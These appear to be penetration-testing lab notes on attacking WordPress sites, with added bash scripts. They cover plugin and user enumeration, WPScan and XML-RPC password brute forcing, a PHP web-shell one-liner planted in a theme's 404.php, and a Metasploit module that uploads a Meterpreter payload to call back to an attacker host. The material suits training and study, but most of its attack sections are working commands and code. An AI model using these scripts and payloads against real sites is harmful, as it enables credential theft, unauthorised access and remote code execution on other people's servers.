WordPress Attacks

Discovery/Footprinting

  • Look at /robots.txt; a stock WordPress install advertises its admin path, the admin-ajax endpoint, upload directories and the sitemap. The wpforms upload path below also leaks that the WPForms plugin is installed:

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml

  • Presence of the /wp-admin/, /wp-content/ and /wp-includes/ directories (the /wp-sitemap.xml route is also WordPress-specific; core sitemaps arrived in 5.5)

Enumeration

  • version: the generator meta tag, if the theme has not removed it

curl -s https://blog.inlanefreight.local | grep WordPress
<meta name="generator" content="WordPress 5.8" />

  • themes: referenced as /wp-content/themes/<slug>/ in stylesheet and script URLs

curl -s https://wehost.co.in/ | grep themes

  • plugins: referenced as /wp-content/plugins/<slug>/, usually with a ?ver= query string that hints at the plugin version; only plugins that load an asset on the fetched page show up this way, so an empty result does not mean no plugins

curl -s https://wehost.co.in/ | grep plugins

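The grep commands above only show whole matching lines. The following script is an added example (not part of the original notes) that pulls the core version, theme slugs, plugin slugs and the ?ver= hints out of a page body; the functions read HTML on stdin, SAMPLE_HTML is a constructed page for offline use, and blog.inlanefreight.local is the hostname the notes use.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): extract the core version, theme slugs,
# plugin slugs and asset ?ver= hints from a WordPress page body instead of eyeballing
# whole grep'd lines. Functions read the HTML on stdin. SAMPLE_HTML is constructed for
# offline use; blog.inlanefreight.local is the hostname the notes use.

# Core version from the generator meta tag; prints nothing if the tag was stripped.
wp_version() {
  grep -oE 'content="WordPress [0-9][0-9.]*"' | head -n1 \
    | sed -E 's/.*WordPress ([0-9.]+)"/\1/'
}

# Unique slugs under /wp-content/<kind>/ where kind is "themes" or "plugins".
# Only components that load an asset on the fetched page show up here; a plugin
# that is active but silent on the home page needs wpscan or path brute forcing.
wp_slugs() {
  kind="$1"
  grep -oE "wp-content/$kind/[A-Za-z0-9_.-]+/" \
    | sed -E "s#wp-content/$kind/([^/]+)/#\1#" | sort -u
}

# "<plugin> <ver>" pairs from the ?ver= query string on plugin assets. Plugins often
# enqueue assets with their own version, but some reuse the core version or a
# cache-buster, so treat the number as a hint and confirm it against the plugin's
# readme.txt (Stable tag) where that file is readable.
wp_plugin_versions() {
  grep -oE 'wp-content/plugins/[A-Za-z0-9_.-]+/[^"? ]*\?ver=[0-9][0-9.]*' \
    | sed -E 's#wp-content/plugins/([^/]+)/.*\?ver=([0-9.]+)#\1 \2#' | sort -u
}

# Constructed sample page (not captured from a real host).
SAMPLE_HTML='<!DOCTYPE html><html><head>
<meta name="generator" content="WordPress 5.8" />
<link rel="stylesheet" href="https://blog.inlanefreight.local/wp-content/themes/twentynineteen/style.css?ver=2.0" />
<link rel="stylesheet" href="https://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.2" />
<script src="https://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2"></script>
<script src="https://blog.inlanefreight.local/wp-content/plugins/wpforms-lite/assets/js/wpforms.min.js?ver=1.6.9"></script>
</head><body></body></html>'

# Live use: TARGET=http://blog.inlanefreight.local bash wp_enum.sh
if [ -n "${TARGET:-}" ]; then
  body="$(curl -s -L "$TARGET/")"
  printf 'version: %s\n' "$(printf '%s' "$body" | wp_version)"
  printf 'themes:\n%s\n' "$(printf '%s' "$body" | wp_slugs themes)"
  printf 'plugins:\n%s\n' "$(printf '%s' "$body" | wp_slugs plugins)"
  printf 'plugin versions (hint):\n%s\n' "$(printf '%s' "$body" | wp_plugin_versions)"
fi
```

Run it with TARGET set to hit a live host; without TARGET it only defines the functions, which is how the sample page is checked offline. Feeding other pages of the site (a contact page, a post) widens the plugin list, since each page enqueues its own assets.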
Enumerating Users

  • The login page is at /wp-login.php.

  • The login form leaks valid usernames: a valid username with a wrong password returns an error saying the password for that user is incorrect, while an unknown username returns an error saying the user was not found. Compare both responses on the target before relying on the difference, since a theme or plugin can replace the messages.

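An added example (not from the original notes) that turns the error-message difference described above into a username check. The matched substrings are the ones WordPress's own login errors have carried across versions ("is incorrect" for a real user; "Invalid username", "is not registered on this site" or "Unknown username" for an unknown one); they are assumptions to confirm against the target. The sample bodies are constructed and the hostname is the one the notes use.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): classify wp-login.php responses so the
# error-message difference becomes a username oracle. The substrings below are the
# ones WordPress login errors have used ("is incorrect" for a real user; "Invalid
# username" / "is not registered on this site" / "Unknown username" for an unknown
# one); confirm them against the target, a theme or plugin can replace the messages.
# Sample bodies are constructed; blog.inlanefreight.local is the notes' hostname.

# wp_login_verdict <http_status> <body>: login-success | valid-user | invalid-user | unknown
# A successful login is a 302 to wp-admin with an empty body, so the status matters too.
wp_login_verdict() {
  status="$1"; body="$2"
  if [ "$status" = "302" ]; then echo "login-success"; return 0; fi
  case "$body" in
    *"is incorrect"*) echo "valid-user" ;;
    *"Invalid username"*|*"not registered on this site"*|*"Unknown username"*) echo "invalid-user" ;;
    *) echo "unknown" ;;   # blocked, rate limited, or hardened with a generic message
  esac
}

# wp_login_try <base_url> <user> <pass>: one POST to the login form, classified.
wp_login_try() {
  tmp="$(mktemp)"
  status="$(curl -s -o "$tmp" -w '%{http_code}' \
    --data-urlencode "log=$2" --data-urlencode "pwd=$3" --data 'wp-submit=Log+In' \
    "$1/wp-login.php")"
  wp_login_verdict "$status" "$(cat "$tmp")"
  rm -f "$tmp"
}

# wp_enum_users <base_url> < candidates.txt: one junk-password attempt per candidate.
wp_enum_users() {
  while IFS= read -r user; do
    [ -n "$user" ] || continue
    printf '%s\t%s\n' "$user" "$(wp_login_try "$1" "$user" 'not-the-password-7f3a')"
  done
}

# Constructed sample bodies shaped like WordPress 5.x login errors.
SAMPLE_VALID_USER='<div id="login_error"><strong>Error</strong>: The password you entered for the username <strong>john</strong> is incorrect. <a href="http://blog.inlanefreight.local/wp-login.php?action=lostpassword">Lost your password?</a><br /></div>'
SAMPLE_INVALID_USER='<div id="login_error"><strong>Error</strong>: The username <strong>admin2</strong> is not registered on this site. If you are unsure of your username, try your email address instead.<br /></div>'

# Live use: TARGET=http://blog.inlanefreight.local bash wp_users.sh < users.txt
if [ -n "${TARGET:-}" ]; then
  wp_enum_users "$TARGET"
fi
```

Every candidate costs one failed login, so expect lockouts or a WAF block if a login-protection plugin is active; an "unknown" verdict on every name usually means exactly that, and the check should stop rather than keep hammering.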
WPScan

sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB<SNIP>

  • --enumerate with no argument runs WPScan's default set (vulnerable plugins and themes, timthumbs, config backups, database exports, users, media); --api-token supplies the WPScan API key used to look up known vulnerabilities for the detected versions (token truncated here). Without a token you still get the version and component enumeration, just no vulnerability data.

Attacking WordPress

Login Bruteforce

  • The wp-login method brute forces the standard login form, while the xmlrpc method makes login attempts through the WordPress XML-RPC API at /xmlrpc.php.

    • The xmlrpc method is preferred because it is faster (no form or cookie handling), but it only works when /xmlrpc.php is enabled. A GET to it on a live endpoint returns "XML-RPC server accepts POST requests only."; if the site has disabled XML-RPC, fall back to wp-login.

    • -t 20 runs 20 threads; lower it against login-protection plugins that rate limit or lock accounts.

sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local

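The exchange wpscan drives in xmlrpc mode, as an added example (not from the original notes) done by hand with curl so the request body and both kinds of answer are visible. It uses the wp.getUsersBlogs method, which requires valid credentials and is therefore a login oracle; unlike the login form it returns the same 403 fault for a bad username and a bad password, so it does not enumerate users. Sample responses are constructed in the shape WordPress's IXR server produces; the hostname is the one the notes use.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): the XML-RPC login exchange behind
# wpscan's --password-attack xmlrpc, driven by curl so both sides are visible.
# wp.getUsersBlogs needs valid credentials, which makes it a login oracle; it returns
# the same 403 fault for a bad user and a bad password, so it is not a user oracle.
# Sample responses are constructed; blog.inlanefreight.local is the notes' hostname.

# Escape & < > so wordlist entries containing them still produce well-formed XML.
xml_escape() {
  printf '%s' "$1" | sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g'
}

# xmlrpc_login_payload <user> <pass>: one wp.getUsersBlogs call, one attempt per request.
xmlrpc_login_payload() {
  printf '<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>' \
    "$(xml_escape "$1")" "$(xml_escape "$2")"
}

# xmlrpc_verdict <response_body>: ok | bad-creds | disabled | endpoint-present | unknown
xmlrpc_verdict() {
  case "$1" in
    *"<name>isAdmin</name>"*)                    echo "ok" ;;               # blog list returned
    *"<name>faultCode</name>"*"<int>403</int>"*) echo "bad-creds" ;;        # "Incorrect username or password."
    *"<name>faultCode</name>"*"<int>405</int>"*) echo "disabled" ;;         # "XML-RPC services are disabled on this site."
    *"accepts POST requests only"*)              echo "endpoint-present" ;; # answer to a plain GET
    *) echo "unknown" ;;
  esac
}

# xmlrpc_probe <base_url>: GET /xmlrpc.php; a live endpoint answers with the POST-only message.
xmlrpc_probe() {
  xmlrpc_verdict "$(curl -s "$1/xmlrpc.php")"
}

# xmlrpc_login <base_url> <user> <pass>: one authentication attempt.
xmlrpc_login() {
  xmlrpc_verdict "$(curl -s -H 'Content-Type: text/xml' \
    --data-binary "$(xmlrpc_login_payload "$2" "$3")" "$1/xmlrpc.php")"
}

# xmlrpc_bruteforce <base_url> <user> < wordlist: stop at the first accepted password.
xmlrpc_bruteforce() {
  while IFS= read -r pw; do
    case "$(xmlrpc_login "$1" "$2" "$pw")" in
      ok) printf 'VALID %s:%s\n' "$2" "$pw"; return 0 ;;
      disabled) echo 'xmlrpc disabled; use --password-attack wp-login instead' >&2; return 2 ;;
    esac
  done
  return 1
}

# Constructed sample responses in the shape WordPress's IXR server returns.
SAMPLE_FAULT_403='<?xml version="1.0" encoding="UTF-8"?><methodResponse><fault><value><struct><member><name>faultCode</name><value><int>403</int></value></member><member><name>faultString</name><value><string>Incorrect username or password.</string></value></member></struct></value></fault></methodResponse>'
SAMPLE_FAULT_405='<?xml version="1.0" encoding="UTF-8"?><methodResponse><fault><value><struct><member><name>faultCode</name><value><int>405</int></value></member><member><name>faultString</name><value><string>XML-RPC services are disabled on this site.</string></value></member></struct></value></fault></methodResponse>'
SAMPLE_OK='<?xml version="1.0" encoding="UTF-8"?><methodResponse><params><param><value><array><data><value><struct><member><name>isAdmin</name><value><boolean>1</boolean></value></member><member><name>url</name><value><string>http://blog.inlanefreight.local/</string></value></member><member><name>blogid</name><value><string>1</string></value></member><member><name>blogName</name><value><string>Inlanefreight</string></value></member><member><name>xmlrpc</name><value><string>http://blog.inlanefreight.local/xmlrpc.php</string></value></member></struct></value></data></array></value></param></params></methodResponse>'

# Live use: TARGET=http://blog.inlanefreight.local WP_USER=john bash wp_xmlrpc.sh < /usr/share/wordlists/rockyou.txt
if [ -n "${TARGET:-}" ]; then
  echo "probe: $(xmlrpc_probe "$TARGET")"
  xmlrpc_bruteforce "$TARGET" "${WP_USER:-john}"
fi
```

Run the probe first: "endpoint-present" means the POST path is worth trying, "disabled" or "unknown" means wpscan's xmlrpc mode will fail the same way and wp-login is the fallback. The escaping step matters with rockyou-style lists, where entries containing & or < would otherwise be rejected as malformed XML and silently counted as failures.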
Code Execution

  • With an administrator account, Appearance > Theme Editor lets you edit a theme's PHP files. Pick a file in an inactive theme so the live site keeps working (here 404.php of Twenty Nineteen), add a one-liner, then request the file directly with the command in the 0 parameter:

system($_GET[0]);
curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id

  • URL-encode commands that contain spaces or shell metacharacters, and remove the line again when done.

PHP Meterpreter shell

  • exploit/unix/webapp/wp_admin_shell_upload logs in with the admin credentials and uploads a generated plugin carrying the payload. RHOSTS takes the IP and VHOST the virtual host name so the request reaches the right site:

use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 10.129.42.195
set vhost blog.inlanefreight.local
set username john
set password firebird1
set lhost 10.10.14.15
show options
exploit
